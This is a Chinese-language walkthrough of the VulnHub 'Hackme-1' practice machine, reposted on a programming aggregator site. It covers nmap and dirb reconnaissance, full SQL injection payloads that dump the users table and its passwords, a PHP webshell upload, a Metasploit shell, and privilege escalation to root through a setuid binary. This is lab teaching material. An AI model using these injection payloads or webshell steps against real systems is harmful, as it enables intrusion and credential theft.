欢迎访问 生活随笔!

生活随笔

当前位置: 首页 > 编程资源 > 编程问答 >内容正文

编程问答

Hackme-1靶机

发布时间:2024/1/18 编程问答 51 豆豆
生活随笔 收集整理的这篇文章主要介绍了 Hackme-1靶机 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

一、靶场介绍

        1.下载地址:https://www.vulnhub.com/entry/hackme-1,330/

        2.将靶机网络适配器改为仅主机模式

         3. 启动靶机

二、信息收集

1、主机发现

nmap -sn 192.168.139.1/24

2.查看端口开放情况,发现其22、80端口开放   

 nmap 192.168.139.128

 

3.靶机目录扫描 

      dirb http://192.168.139.128

 

三、渗透流程

sql注入

1、登录主页发现登录页面,而且还可以注册用户

 

2.注册用户:admin/123456

3.登录

4.查看是否有sql注入,点击search可以查看所有信息

5.验证sql注入 Windows OS' and 1=1#

Windows OS' and 1=2#由此看出存在字符型(单引号)sql注入

6.判断字段数 Windows OS' order by 3#

Windows OS' order by 4#判断字符数为3

7.判断显示位置-1' union select 1,2,3#

8.查看当前数据库位置-1' union select database(),2,3#

9.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

10.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

11.查看表中user,password字段数据-1' union select group_concat(user),group_concat(pasword),3 from users#

12.将密码进行MD5解密

四、文件上传

1.使用superadmin用户登录 密码:Uncrackable发现其存在文件上传

  

2.上传phpinfo文件进行验证,发现上传成功

3.尝试上传一句话木马,页面回显空白,上传成功

  

4.尝试使用蚁剑连接

5.Kali生成木马文件

6.将木马文件上传至靶机中

7.kali开启msf监听

8.蚁剑中运行木马文件

9.成功获取shell

10.切换到shell,输入whoami可查看具体信息

11.获取shell后切换到python终端,输入python -c 'import pty;pty.spawn("/bin/bash")'

12.跳转到home/legacy目录下,ls发现 ./touchmenot文件

  

13.输入 ./touchmenot,运行获得root

总结

以上是生活随笔为你收集整理的Hackme-1靶机的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错,欢迎将生活随笔推荐给好友。